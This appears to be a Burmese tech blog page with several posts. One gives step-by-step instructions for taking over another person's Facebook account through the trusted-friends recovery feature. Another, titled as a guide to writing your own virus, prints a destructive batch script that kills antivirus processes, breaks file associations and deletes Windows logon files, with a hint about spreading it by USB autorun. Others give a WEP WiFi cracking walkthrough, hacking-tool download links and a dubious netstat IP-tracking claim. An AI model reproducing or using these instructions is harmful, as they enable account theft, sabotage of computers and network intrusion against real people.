ကဲ သူများတွေ ဘာပေးပေး သတိနဲ့  နေရင် ဘာမှမဖြစ်ပါဘူး (အေးအေးဆဲဆဲနေမယ်) ဆိုရင် ဘာမှမဖြစ်ပါဘူး၊ ကိုယ်မသိတဲ့လူက ပို့ လို်က်တဲ့ Email တွေမှာ ပါတဲ့ File တွေကို ပြီးတော့ Offical site မဟုတ်ဘဲ file shared မှာ Download ရမယ့် Link တွေကို ဆိုရင် သတိထားပါ၊ သူများ Tools တွေ Software တွေ လာပေးပါက Official site Link ကိုတောင်းပါ၊ မပေးနိုင်လျှင် Fakeware (malware) ဖြစ်ပါတယ်။ Tools EXE files တွေ လာပေးပါက နာမည်မေးပါ… ဘယ်ဟာလဲ.. ဘာလုပ်တာလဲ… ပြီးတော့ Google မှာ ရှာလျှင် အဲဒီဟာက ဘာလုပ်တာလဲ ဆိုတာ သိနိုင်ပါတယ်၊
Facebook ကို Secure လုပ်ချင်လျှင် http://facebook.com/hacked ကို သွားလိုက်ပါ။ ပြီးလျှင် Step By Step Facebook လုပ်ခိုင်းအတိုင်း Password/Security Question ချလိုက်ပါ၊
ပြီးတော့ လူတိုင်းက Password တစ်ခုတည်းကို နေရာတိုင်းတွင် သုံးလေ့ရှိပါတယ်၊ အဲသလိုမျိုး ထားတာ မကောင်းပါဘူး။ တခုခံရလျှင် နောက်တခုလည်း တပါတည်း ခံရတတ်ပါတယ်၊ အဲဒါကြောင့် တခုနဲ့  တခုထားတဲ့ ဟာတွေ ကို မတူပါစေနဲ့ ၊
နောက်ဆုံးပိတ်အနေနှင့် ပြောရလျှင် ရိုးရိုးလေးသာ Facebook ကို သုံးလျှင် ဘာမှမဖြစ်နိုင်ပါဘူး၊(အကောင့်ဟက်ခံရတာ ပြောတာပါ)၊ အကောင့် Report ခံရလို့  ပိတ်သွားလျှင် တာကတော့ တမျိုးပေါ့ဗျာ၊

  • credit to  Bug Lab :P

အပြည့်အစုံ

Facebook မှ တဆင့် တစ်စုံတစ်ယောက် ရဲ့ IP address ကို သိလိုလျှင်



-မိမိ ip သိလိုသူကို chat box မှာ chatting လုပ်နေပါ
-အဲ့ဒီ အချိန် တစ်ပြိုက်နက်တည်းမှာ window ရဲ့ 
cmd (command promp) ကို သွားပါ ။
-cmd ကိုရောက်လျှင် netstat ဆိုတဲ့  command ကိုရိုက်ထည့်ပါ။
အဲ့ဒါဆိုရင်တော့ မိမိ သိလိုသူ ရဲ့ IP လိပ်စာကို ရရှိမှာဖြစ်ပါတယ်။

အထက်ပါအဆင့်ကိုလုပ်ဆောင်ရာတွင် အထူးသတိပြုရမှာကတော့
browser က history and cache တွေကို ရှင်းလင်းထားဖို့ လိုအပ်ပြီး တစ်ခြား အသုံးပြုနေတဲ့ tab တွေကို ပိတ်ထားပြီး facebook chat နေတဲ့  tab တစ်ခုပဲဖွင့်ထားရမှာဖြစ်ပါတယ်။

အားလုံးအဆင်ပြေကြပါစေ။

credit to Al Pha Vanishing

အပြည့်အစုံ

3 trusted friendsဖြင့် Facebook အကောင့်ယူနည်း နှင့် ကာကွယ်နည်း



အခုပြောပြမယ့်လမ်းကတော့ လူတိုင်းသတိမထာမိတဲ့အချက်တွေပါ သတိပြုမိတဲ့သူတွေလည်ရှိမှာပါ မရှိတဲ့သူတော့ တော်တော်များပါတယ် ကျနော်တွေ့သမျှတော့ တော်တော်များတယ် ဒါပေမယ့်လည် သွာမပြောရဲဘူး တော်ကြာကိုယ်ပြောပြီးမှ သူ့အကောင့်တစ်ခုခုဖြစ်တယ်ဆို ပြသနာရှာမှာဆိုလို့။ ကျနော်တွေ့သမျှ
ထဲက သံဃာတော်တွေပိုင်းတဲ့အကောင့်တွေလောက်ပဲ သတိပေးပြောပါတယ်.ကိုယ်တွေအချင်းချင်းတော့မပြောရဲလို့ အခုလိုပိုစ့်လေးတင်ဖြစ်သွာတာပါ အောက်မှာလေ့လာကြပါ





အထက်ပါပုံအတိုင်း ကျနော်တို့ ပြစ်မှတ်ရဲ့ဖေ့ဘုတ်အကောင့်က About ကိုနှိပ်ပြီးဝင်လိုက်ပါမယ် Contact Info မှာ အကောင့်ကိုဖွင့်ထာတဲ့ Email ကိုဖွတ်ပေးမယ့်
ဖေ့ဘုတ်မေလ်ကိုတော့မဖွက်ထာတဲ့အတွက် အဲဒီပုံမှာပါတဲ့အတိုင်း အဲဒီမေလ်နဲ့အကောင့်ကိုယူပါမယ်..ပုံမှာပါတဲ့မေလ်ကို Copyကူးယူလိုက်ပါ..ထို့နောက်

အဆင့်-1


Facebook – Browser ထဲကို ဝင်လိုက်ပြီးနောက် အထက်ပါပုံအတိုင်း Email or Phone ဆိုတဲ့ Box မှာ စောစောက ကူးယူလာတဲ့ဖေ့ဘုတ်မေလ်ကိုဖြည့်လိုက်ပါမယ်
ထို့နောက် Forgot your password? ဆိုတာကိုနှိပ်လိုက်ပါ။


အဆင့်-2


Email, phone or Facebook username ဆိုပြီးအထက်ပါပုံအတိုင်း ပေါ်လာပါတယ်။Email, phone or Facebook username ဆိုတဲ့ Boxမှာ စောစောက ကူးယူလာတဲ့ဖေ့ဘုတ်မေလ်ကိုဖြည့်လိုက်ပါ ..ဖြည့်ပြီးပါက Search ဆိုတာကိုနှိပ်ပါက ကျနော်တို့လိုခြင်းနေတဲ့ ဖေ့ဘုတ်အကောင့်ပေါ်လာပါမယ်။


အဆင့်-3
 

အထက်ပါပုံအတိုင်း သင့်အကောင့်လားလို့ဆိုပြီးမေးလာပါမယ်.. အဲဒီမှာပါတဲ့ Yes , This is my account ကိုနှိပ်ပေးလိုက်ပါ


အဆင့်-4


အထက်ပါပုံအတိုင်း Pasword ပြန် rest လုပ်မလားလို့ မေးပါလိမ့်မယ် ခဏနေအုန် ဘာမှမနှိပ်ပါနဲ့။ အရေးကြီးတဲ့ အပိုင်းစလာပါပြီး ကျနော်တို့ ရယူမို့ကြိုစားနေတဲ့ ဒီအကောင့်ကို အသုံးမပြုတာ အတော်ကြာနေတယ်ဆို I have on longer use this account ဆိုတာပေါ်နေပြီး။လက်ရှိအသုံးပြုနေဆဲဆိုပါက No longer have access to these? ဆိုပြီးပေါ်နေပါမယ် အခုကျနော်ယူမယ့်အကောင့်က သုံးနေဆဲအကောင့်ပါ.အဲဒီတော့  No longer have access to these? ဆိုတာကိုနှိပ်လိုက်ပါမယ်


အဆင့်-5


I have no longer use this account ကို နှိပ်လိုက်ပြီးပါက အထက်ပါပုံအတိုင်း
Please enter an email address that you know you can access. We'll use this address to send you messages about recovering your account.
ဆိုပြီးတော့ boxထပ်ကျလာပါမယ်အဲဒီမှာ  email address  ဖြည့်စွက်ရမယ့်မေလ်က Facebook အကောင့် လုံးဝမဖွင့်ရသေးတဲ့ မေလ်အသစ်ဖြစ်ရပါမယ်.အဲဒီမှာပုံအတိုင်း
မေလ်ကိုနှစ်ကြိမ်းဖြည့်ရပါမယ်သို့သော် ကျနော်တို့ဖြည့်လိုက်တဲ့မေလ်ကို ဖေ့ဘုတ်ကနေ မေလ်ပို့လာမှာမဟုတ်ပါဘူး ဘာဖြစ်လို့လည်ဆိုတော့  Security layerကြောင့်ပါ။
ကယ်ကျနော်တို့မေလ်အသစ်ဖြည့်ပြီးပါက Continue ဆိုတာကိုနှိပ်လိုက်ပါမယ်..။


အဆင့်-6


 အထက်ပါပုံကတော့ ဒီအကောင့်ကို ရယူရန်အတွက်လုပ်ဆောင်ရမယ့်အဆင့်ကိုပြထာပါ..ထို့နောက် Continue ဆိုတာကိုပဲ ဆက်နှိပ်ပါ


အဆင့်-7
 
စပါပြီး 3 trusted friends အစီစဉ်ကျနော်တို့ရယူမယ့်  Facebook အကောင့်ထဲက 3 trusted friends ရွေးရပါတော့မယ် အဲဒီအကောင့်ထဲမှာ ကျနော်တို့အနေနဲ့
3 trusted friends အစီစဉ်အောင်မြင်အောင် အကောင့်တွေကြိုတင်အက်ထာပြီးတော့ အဲဒီထဲက ကျနော်တို့ အက်ထာတဲ့အကောင့်3ခုကိုရွေးလိုက်ပါမယ်
အကောင့်3ခုရွေးပြီးပါက Continueဆိုတာကိုနှိပ်ပါ..(မှတ်ချက်-အကောင့်တစ်ခုရွေးပြီးတိုင်Continueဆိုတာကိုနှိပ်ပါ)


အဆင့်-8

အထက်ပါပုံအတိုင်း သူငယ်ချင်3းယောက်ရွေးပြီးပါက Send Codes to Friends ဆိုတာကိုနှိပ်လိုက်ပါ..။


အဆင့်-9


အထက်ပါပုံအတိုင်း ကျနော်တို့ရွေးချယ်လိုက်တဲ့ အကောင့်3ခုကို ကုဒ်တွေပို့လာပါမယ် အဲဒီကုဒ်တွေကို ဖြည့်ပြီးပါက  Submit Condes ဆိုတာကိုနှိပ်ပါက.။
အဲဒီအဆင့်ပြီးတာနဲ့ -ကျနော်တို့ရယူမယ့်အကောင့်ကို Recover လုပ်ရပါပြီး..။

ဒီလိုအရမ်းလွယ်ကူတဲ့ ဟက်နည်းလမ်းပါ ဘာTool မှမသုံးပဲ ဟက်သွားတာ ဖြစ်ပါတယ်။ဒီလောက်လွယ်တာလည်ဆိုတော့ Security Question ကိုမခံထာလို့ပါ တကယ်လို့ Security Questionခံထာလည် လွယ်တဲ့ Security Questionပြုလုပ်ထာပါကလည် ရယူသွာပါမည်။
ကျနော်တို့အနေနဲ့ အကောင့်ယူလို့မအောင်မြင်ရင်တောင် အဲဒီအကောင့်သေချာပေါက် Lock ကျပါမယ်.အင်မတန် ကြောက်စရာ ကောင်းပါတယ်။


ကာကွယ်ရမယ့်အချက်တွေကတော့

1-  Facebook ဖွင့်ထားတဲ့ Emailကို Only Me လုပ်ထာပါ။
2- Facebook ကပေးတဲ့  Emailကိုလည် Only Me လုပ်ထာပါ
3- Security Question ကို လေးလေးနက်နက်ပြုလုပ်ထာပါ
4-ကိုယ့်မသိတဲ့ သူတွေလာအက်ရင်လက်မခံမို့ပါ

Security Question ကို ပြီးပြီးရောဆိုပြီး အလွယ်တကူတွေထားတော့ ရယူမယ့်သူက အေးဆေယူသွာမှာပေါ့။ Security Question လေးလေးနက်နက်ပြုလုပ်ထားရင် အကောင့်ဟက်ခံရခြင်းမှစိတ်ချရပါမယ်။


အဓိကသတိပေးခြင်းတာကတော့ Security Questionလေးလေးနက်နက်ပြုလုပ်ထာပါလို့အကြံပြုခြင်းပါတယ်။


အခုပိုစ့်လေးကို မိတ်ဆွေ သူငယ်ချင်းအချင်းချင်း အကောင့် ပျောက်ဆုံးခြင်းမရှိစေရန် လက်ဆင့်ကမ်းမျှဝေးပေးပါရန် တိုတ်တွန်းလိုက်ပါသည်။ by ဖေ့ဘုတ်ဆိုင်ရာ နည်းပညာများ

အပြည့်အစုံ

Saturday 15 December 2012

Stanford တက္ကသိုလ်မှာ သင်တဲ့ C++ Programming လေ့ကျင့်ခန်း CD (Video ကျူတိုရီရယ်)

 



စတန်းဖို့လ် တက္ကသိုလ်မှာ သင်ပေးတဲ့ C++ : Programming ဗီဒီယို ကျူတိုရီရယ် CD တွေပါ အရမ်းကောင်းပါတယ် ရှယ်ပေးမယ်လုပ်နေတာတော့ ကြာပါပြီ မရှယ်ဖြစ်ဘူးဖြစ်နေတယ်
C++ : Programming လေ့လာနေသူများအတွက်တော့ အရမ်း အဖိုးတန်မှာပါ အခုမှ စလေ့လာမယ် ဆိုသူများလဲ အသုံးတည့်ပါတယ် စတန်းဖို့လ် တက္ကသိုလ်မတက်နိုင်ပေမယ့် သူတို့ဆီက သင်ပေးတာ လေ့လာနိုင်လဲ ပညာပဲ မဟုတ်လားဗျာ ဒီတော့ ဒေါင်းလိုက်ဦးပေါ့










ပြီးပြီနော် ဒါဒေါင်းပြီးရင်

အပြည့်အစုံ

ကိုယ်ပိုင်ဗိုင်းရက်စ်ရေးကြမယ်

Notepadနဲ့ cmdသုံးပြီးတော့ ဗျာ ၀င်းဒိုး XP ကို စုတ်ပြတ်သတ်သွားအောင် မွှေလိုက်ရအောင် ကဲအောက်က codeလေးတွေကို သေချာကြည့် Notepadလေးဖွင့်ပြီး လိုက်ရေးပေါ့

title Hack Setup
color 0A
@echo off
set end=md "Hack installing"
set fin=copy "Hack log.txt" "Installing"
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked....
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown

titleတို့@echo off တို့က ခုခောတ် ကလေးပေါက်စတောင် သိနေတော့ပြောရင်
စော်ကားရာကြမယ် ဒီတော့မရှင်းတော့ဘူးနော်. . . ။
အဲရှင်းပြမယ်သာပြောတာပါ အခုနကုဒ်တွေက အကုန်သိကြပါတယ် . .။
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
ဒီဟာတွေကိုပြောပြမယ်ဗျာ ဒီလို
ဝင်းဒိုးရဲ့အဓိက processတွေကိုend task လုပ်ဖို့ရေးတာဗျ
အဲဒါဆိုexplorerကြသွားလိမ့်မယ်ဗျာ . .

cls ကတော့သိတဲ့အတိုင်းလေ နောက်ကြောင်းရှင်ဖို့ပေါ့ . . . ။
assoc .exe=txtfile
assoc .txt=mp3file
ဒါကတော့ .exe fleနဲ့.txtဖိုင်တွေဖွင့်မရအောင်လုပ်တဲ့ကွန့်မန့်ပေါ့ဗျာ
တချား extentionတွေလဲထည့်သုံးလို့ရတယ်ဗျာ.

msg * It is you who is hacked....
msg * I warned you, and you kept going. Challenge me and this is what happens.
အဲဒိနေရာမှာ

ကိုရေးချင်တဲ့စာကိုပြင်ရေးဗျ msg *အနောက်မှ englishလိုပဲနော်
comment boxလေးနဲ့တက်လာလိမ်မယ်. . .
အောက်ဆုံးကဟာကအတော်လေးဆိုးတယ်ဗျ. . .
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
အဲဒိဟာက shutdown တို့log onတို့ ကိုဖြက်ပြစ်တာ
အဲဒိအတွက်သင့်ကွန်ပြူတာက ရှက်ဒေါင်းချလို့မရတော့ဘူး
log onကိုဖြက်ပြီး ပြီဖြစ်တဲ့အတွက် resetလုပ်လိုက် ရင် ၀င်းဒိုးပြန်မတက်တော့ဘူး
ကဲဘယ်လိုလုပ်မလဲ. . . .။
ဒါဆိုရင်အတော်လေးနိပ်ပြီနော် အဲဒိကုဒ်တွေကို notpadမှာရေးပြီးရင်
.cmd ဒါမှမဟုတ် .bat နဲ့safe ဒါဆို ဗိုင်းရက်စ်တစ်ကောင်ရပြီ
auto run fileလေးလုပ် စတစ်လေးထဲထည့်
သူငယ်ချင်းကိုပေး . . အဲလိုတော့လုပ်ပါနဲ့ဗျာ . . .
ဗိုင်းရပ်စ်ဆိုတာကောင်းတဲ့အကောင်မှမဟုတ်ပဲ
စမ်းကြည့်ဖို့ပဲနော်
မသေချာရင်မလုပ်ကြနဲနော်တော်ကြာဆားဗစ်ရောက်နေဦး မယ် . . .

အပြည့်အစုံ

How to Hack / Crack a WiFi Network In Windows ?



How to Hack a WiFi Network In Windows?
ခဏခဏမေးတတ်ကြတဲ့ wifi ဟက်နည်းပါ တစ်ခုတော့ သိထားပါ မဟက်ခင် စစ်ရင်ပေါ်တယ်ဆိုတာ ကိုတော့ ခေါင်းထဲ အရင်ထည့်ထားပါ စစ်ကြည့်ရင်သိပါတယ် ဖောက်တာကတော့ဖောက်လို့ ရတယ် ဖောက်တဲ့ Tools တွေလဲ တင်ထားပေးတာရှိပါတယ် အရင်ကဖောက်နည်းတစ်ခု ကိုလဲ တင်ထားပေးခဲ့ ပြီးဖြစ်သလို ဖောက်နေတဲ့သူတွေကို ပြန်စစ်မယ့်ဆော့ဝဲလ်ကို လဲ တင်ထားပေးဖူးပါတယ် ကဲ အခု ဘယ်သူရယ်လို့ နာမည်မတပ်တော့ပါဘူး မေးထားတာ အများဆုံးမေးခွန်းမို့လို့ပါ တစ်ခါတလေလဲ တွေးမိပါတယ် အချောင်လိုက်ချင်သူတွေ ဒီလောက်တောင်ပေါသလားလို့ ပြောရင်တော့ဖြင့် ပညာရပ်ကိုတတ်ချင်လို့ပါ လို့တော့ပြောတာပဲ တကယ်တန်း ဒီလို မဟုတ်တာကိုတော့ ကိုယ်တိုင်သိကြပါလိမ့်မယ်

tools နှစ်ခုကို အသုံးပြုပြီး လုပ်ကြည့်ကြပေါ့နော် :
1. Commview for WiFi : 
2. Aircrack-Ng GUI :
ဒီမှာ Tools တွေ ဒေါင်းပါ

1.Aircrack-NG GUI

Get it from here

2.Commview for Wifi

Get it from here
Step 1 :  CommView ကို Install လုပ်ပါ   VoIP mode နဲ့ Standard mode 2မျိုးမှာ  VoIP ကို အသုံးပြအုပြီးလုပ်ပါမယ်. လိုအပ်တဲ့  drivers တွေကို အလိုလို အင်စတောလုပ်ပါလိမ့်မယ်ခွင့်ပြုပေးလိုက်ပါ.

Step 2 :အောက်မှာ ပြထားသလို   PLAY ပုံလေးကို ကလစ်ပေးပါ
 
Step 3 : ( Networkရွေးချယ်ချင်း (a) ) : START SCANNING button လေးကို ကလစ်ပေးပါ
Step 4 : (Networkရွေးချယ်ချင်း (b) ) : Click on the  ညာဘက် Coulumn မှုာ hack ချင်တဲ့ WiFi network ကို ကလစ်ပေးပါ နောက်  CAPTURE ဆိုတာကို ကလစ်ပေးပါ

Note :- ဒီ tutorial  လေးက WEP protected networks တွေ အတွက်ပါနော်မေ့နေလို့
Step 5 : (Capturing the Packets) :started Capturing Packets
 
Step 6 : (Saving the Packets ) : အခု Packets များကို ဆေ့လုပ်ဖို့ လိုပါတယ်
Click on Settings->Options->Memory Usage Change Maximum Packets 20000 ပဲရိုက်ပါ
 
  LOGGING Tab ကိုကလစ်ပါ
AUTO-SAVING ကို Check  လုပ်ပါ
  Maximum Directory မှာ Size ကို  : 5000 ထည့်ပေးပါ
Average Log File Size မှာ : 50 ထည့်ပေးပါ
specified directory မှာ .ncp format အနေဖြင့် 20MB နဲ့ packets တွေကို  အလိုလိုသိမ်းထားပါလိမ့်မယ်
Step 7 : ( Concatenating the Logs ) :
  .ncf file .ဖိုင်တစ်ခု၇လာပါပြီ
Step 8 : (Converting .ncf to .cap ) : ရလာတဲ့  packets တွေကို ဖိုင်ဖော့မက်ပြောင်းပစ်ဖို့  .cap file အဖြစ်ပြောင်းဖို့ အတွက် AIRCRACK နဲ့  crackလုပ်ရပါမယ်

Click on File->Log Viewer->Load Commview Logs-> Choose the .ncf file. Now File->Export->Wireshark/TCP dump format ဒီအတိုင်းလေးပါ

Aircrack Part :

ဒုတိယ အပိုင်းကတော့ရိုးရှင်းပါတယ်.  Aircrack Folder->Bin->Aircrack-ng GUI.exe Choose the .cap file and you should be able to do the others 
ကိုယ့်အရည်အချင်းအပေါ်မူတည်ပြီးလုပ်ရမရ ဆိုတာ ကွာသွားပါလိမ့်မယ် ဘာဖြစ်တယ်ညာဖြစ်တယ်တော့ ပြန်လာ မအော်ပါနဲ့ တင်ပေးပါဆိုလို့ တင်ပေးလိုက်တာ ကျေးဇူးတင်ပါတယ် အာကာဖြိုး

အပြည့်အစုံ

အကောင်းဆုံး wifi hack tools များ

Best WiFi Hack Tools
အကောင်းဆုံး wifi hack tools များကို စုစည်းတင်ပြပေးလိုက်ပါတယ် လောလောဆယ် ကွန် အဆင်မေပြေသေးလို့ www.4shared.com 
ကနေ တင်ပေးလိုက်ပါတယ် လိုချင်သူများ အဆင်ပြေပါစေဗျာ
- Comm View for WiFi v5.2484
- Pure NetWorks NetWork Magic 2
- Air
- AP Sniff
- Comm View
- Aerosol
- Easy WiFi Radar
- Boingo Wireless
- and more ....


Hacks page 2:
- Get Wep Key Of Encrypted Wireless Connection
- WiFi Companion v2.10.4
- Net Stumbler
- WiFi Hack Tools
- WiFi Internet Access Blocker
- iPig WiFi HotSpot VPN Security


Hacks page 3:
- Hot Spotter v0.4
- Kismet
- WDG
- AirShort v0.2.7e
- WiFi Hopper v1.2
- Wireless NetWork Ignition
- Wepwedgie - alpha
- Wep Hacking


Plus e-Books:
- O-Reilly Wireless Hacks
- System Hacking 2k
- FBI Teaches how to break WiFi
- Collection of Hacking Dictionary
- How to Hack WEP


Download Now(akarphyoe.co.nr)
 
ရေးသားသူ - အာကာဖြိုး (နည်းပညာ)

အပြည့်အစုံ

မိုဘိုင်းဖုန်းမှ တခြား Computer, MobilePhone,Tablet များသို့ အင်တာနက် ရှယ်ယာ လုပ်နည်း



အင်တာနက် ရရှိတဲ့ ဖုန်းကနေပြီးတော့ Wi-Fi hotspot တစ်ခု တည်ဆောက်ပေးပြီး ကွန်ပျူတာ၊ မိုဘိုင်းဖုန်းနဲ့ Tablet တွေမှာ အရေအတွက် ရှစ်လုံးအထိ အင်တာနက် မျှဝေ အသုံးပြုနိုင်ပါတယ်။ 
 
အင်တာနက်လိုင်း ရတဲ့ မိုဘိုင်းဖုန်းရဲ့ အင်တာနက် ကွန်နက်ရှင်ကို On ပေးပါ။
 Wi-Fi hotspot တစ်ခု တည်ဆောက်မှာမို့ ဖုန်းရဲ့ Settings ကို အရင်ဖွင့်ပါ။ Wireless & networks ကိုရှာပြီး select လုပ်ပါ။ ကွန်နက်ရှင်ကို Share ပေးမှာမို့ Tethering & portable hotspot ကို ရွေးပေးပါ။ Portable WLAN hotspot ကို တွေ့ရင်တော့ check box မှာ အမှန်ခြစ်ပြီး Portable WLAN hotspot settings ထဲသို့ ၀င်လိုက်ပါ။
 အခြား devices များနှင့် ချိတ်ဆက်မှာဖြစ်တဲ့အတွက်ကြောင့်ကိုယ့် ကွန်နက်ရှင် လုံခြုံစိတ်ချရစေဖို့အတွက် Configure WLAN hotspot ထဲကို ၀င်ပြီး Security Password ပေးရပါမယ်။
 
Configure WLAN hotspot ထဲမှာ Network SSID, Security, Password ဆိုတဲ့ tabs သုံးခုကို တွေ့ရမယ်။
Network SSID မှာ စိတ်ကြိုက် SSID Name ပေးလို့ ရတယ်။ 
 Security ထဲမှာတော့ WPA2 PSK ကို ရွေးပေးလိုက်ပါ။ 
Password ကတော့ မိမိ စိတ်ကြိုက်ပေးလို့ ရပြီး အနည်းဆုံး characters အရေအတွက် (၈) လုံး အထိ ရိုက်ထည့်ပေးရပါမယ်။
 ပြီးသွားရင်တော့ Save လုပ်လိုက်ပါ။
တဖက်မှာလည်း အင်တာနက် လက်ခံအသုံးပြုမယ့် မိုဘိုင်းဖုန်းနဲ့ Tablet မှာ WLAN Settings ထဲကို ၀င်ပြီး အင်တာနက် လွှင့်ထားတဲ့ SSID
Name ကို တွေ့တာနဲ့ Password ရိုက်ထည့်ပြီး အင်တာနက် အသုံးပြုနိုင်ပါတယ်။ ကွန်ပျူတာနဲ့ အင်တာနက် အသုံးပြုချင်ရင်တော့ ကွန်ပျူတာရဲ့
Control Panel > Network and Internet > Manage Wireless Networks ထဲမှာ အင်တာနက် လွှင့်ထားတဲ့ SSID Name ထဲ ၀င်ပြီး Password
ရိုက်ထည့်ကာ အင်တာနက် သုံးလို့ရပြီ

အပြည့်အစုံ